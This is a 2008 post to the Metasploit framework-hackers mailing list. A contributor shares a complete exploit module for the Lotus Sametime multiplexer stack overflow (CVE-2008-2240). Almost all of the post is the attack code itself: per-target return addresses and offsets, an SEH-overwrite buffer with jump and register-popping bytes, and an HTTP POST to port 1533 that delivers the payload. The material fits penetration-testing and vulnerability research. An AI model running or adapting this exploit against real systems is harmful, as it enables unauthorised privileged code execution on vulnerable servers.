[framework-hackers] IBM Lotus Sametime Community Services Multiplexer Stack Overflow

Sat, 15 Nov 2008 04:39:13 -0800 

Hi Patrick,
I saw you've added domino_sametime_stmux.rb to the dev svn.
I've wrote the same exploit a couple months ago, maybe you add some of my offsets/targets to your module. 

Regards,
riaf


##
# $Id: ibm_lotus_sametime_stmux.rb 2008-06-01 20:00:00Z riaf $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IBM Lotus Sametime Community Services Multiplexer Stack Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in Lotus Sametime
				prior to version 7.5.1CF2 and 8.0.1. 
			},
			'Author'         => [ 'riaf' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
	  				['BID', '29310'],
					['CVE', '2008-2240'],
				],
			'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'seh',
                                },
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'           => 1024, 
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Lotus Sametime 7.5 Windows 2002 SP4', { 'Rets' => [ 0x7c3410c2, 3, 268 ] }],
					['Lotus Sametime 7.5 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 4, 269 ] }],
					['Lotus Sametime 7.5.1 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 5, 269 ] }],
					['Lotus Sametime 8.0.0 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 4, 269 ] }],
				],
			'DisclosureDate' => 'May 21 2008'))

			register_options( [ Opt::RPORT(1533) ], self.class )
	end

	def exploit
		connect

		pad1 = rand_text_alpha_lower(44)
		pad2 = rand_text_alpha_lower(29)
		popebx = "\x5b" * target['Rets'][1] 
		popad = "\x61" * target['Rets'][2]
		jmpesp = "\xff\x24\x24"
		jmp = "\x74\x23\x75\x21"
                seh = [target['Rets'][0]].pack('V')
		post = payload.encoded

		sploit = pad1 + jmp + seh + pad2 + popebx + popad + jmpesp

		print_status("Trying to exploit target #{target.name} 0x%.8x..." % target['Rets'][0])

		send_request_raw({
                        'uri'          => "/CommunityCBR/CC.39.#{sploit}/",
                        'method'       => 'POST',
			'headers'      => { 'Content-Length' => post.length },
			'data'	       => post 
                }, 5)		

		handler
	end

end





_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers






















					Reply via email to